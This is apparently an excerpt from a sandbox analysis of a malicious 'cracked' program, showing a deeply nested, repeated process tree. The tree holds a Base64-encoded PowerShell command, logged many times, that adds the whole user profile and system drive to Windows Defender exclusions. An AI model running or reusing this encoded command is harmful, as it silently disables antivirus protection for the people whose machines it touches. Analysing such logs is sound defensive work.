C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"93⤵PID:6932
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="94⤵PID:9204
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"94⤵PID:9212
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"94⤵PID:7376
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="95⤵PID:8132
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"95⤵PID:7228
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"95⤵PID:8224
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="96⤵PID:7612
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"96⤵PID:4580
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"96⤵PID:7692
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="97⤵PID:6732
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"97⤵PID:1760
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"97⤵PID:7376
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="98⤵PID:7948
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"98⤵PID:6536
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"98⤵PID:4488
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="99⤵PID:7760
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"99⤵PID:4940
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"99⤵PID:8176
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="100⤵PID:9004
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"100⤵PID:8056
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"100⤵PID:2080
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="101⤵PID:2204
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"101⤵PID:4988
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"101⤵PID:4428
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="102⤵PID:8064
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"102⤵PID:3636
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"102⤵PID:6488
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="103⤵PID:6304
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"103⤵PID:2020
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"103⤵PID:7404
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="104⤵PID:4452
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"104⤵PID:6676
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"104⤵PID:2080
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="105⤵PID:8476
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1106⤵PID:560
-
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"105⤵PID:7376
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"105⤵PID:6796
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="106⤵PID:7164
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"106⤵PID:8224
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"106⤵PID:5008
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="107⤵PID:7180
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"107⤵PID:3484
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"107⤵PID:7840
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="108⤵PID:3308
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"108⤵PID:8456
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"108⤵PID:1968
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="109⤵PID:7084
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"109⤵PID:7952
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"109⤵PID:6992
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="110⤵PID:8992
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"110⤵PID:3100
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"110⤵PID:5792
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="111⤵PID:8496
-
C:\Windows\SysWOW64\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "8496" "1920" "1860" "1924" "0" "0" "1928" "0" "0" "0" "0" "0"112⤵PID:5280
-
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"111⤵PID:8224
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8224 -s 796112⤵
- Program crash
PID:3056
-
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"111⤵PID:9148
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="112⤵PID:6768
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"112⤵PID:6376
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"112⤵PID:1040
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="113⤵PID:8272
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"113⤵PID:5672
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"113⤵PID:8316
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="114⤵PID:4160
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"114⤵PID:3192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 748115⤵
- Program crash
PID:8244
-
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"114⤵PID:2408
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="115⤵PID:8436
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"115⤵PID:8592
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"115⤵PID:8308
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="116⤵PID:6484
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"116⤵PID:5624
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"116⤵PID:6936
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="117⤵PID:5736
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"117⤵PID:7596
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"117⤵PID:8356
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="118⤵PID:1536
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"118⤵PID:5936
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"118⤵PID:6532
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="119⤵PID:7816
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"119⤵PID:5596
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"119⤵PID:5452
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="120⤵PID:4460
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"120⤵PID:7348
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"120⤵PID:8944
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="121⤵PID:8608
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"121⤵PID:4296
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"121⤵PID:4552
-
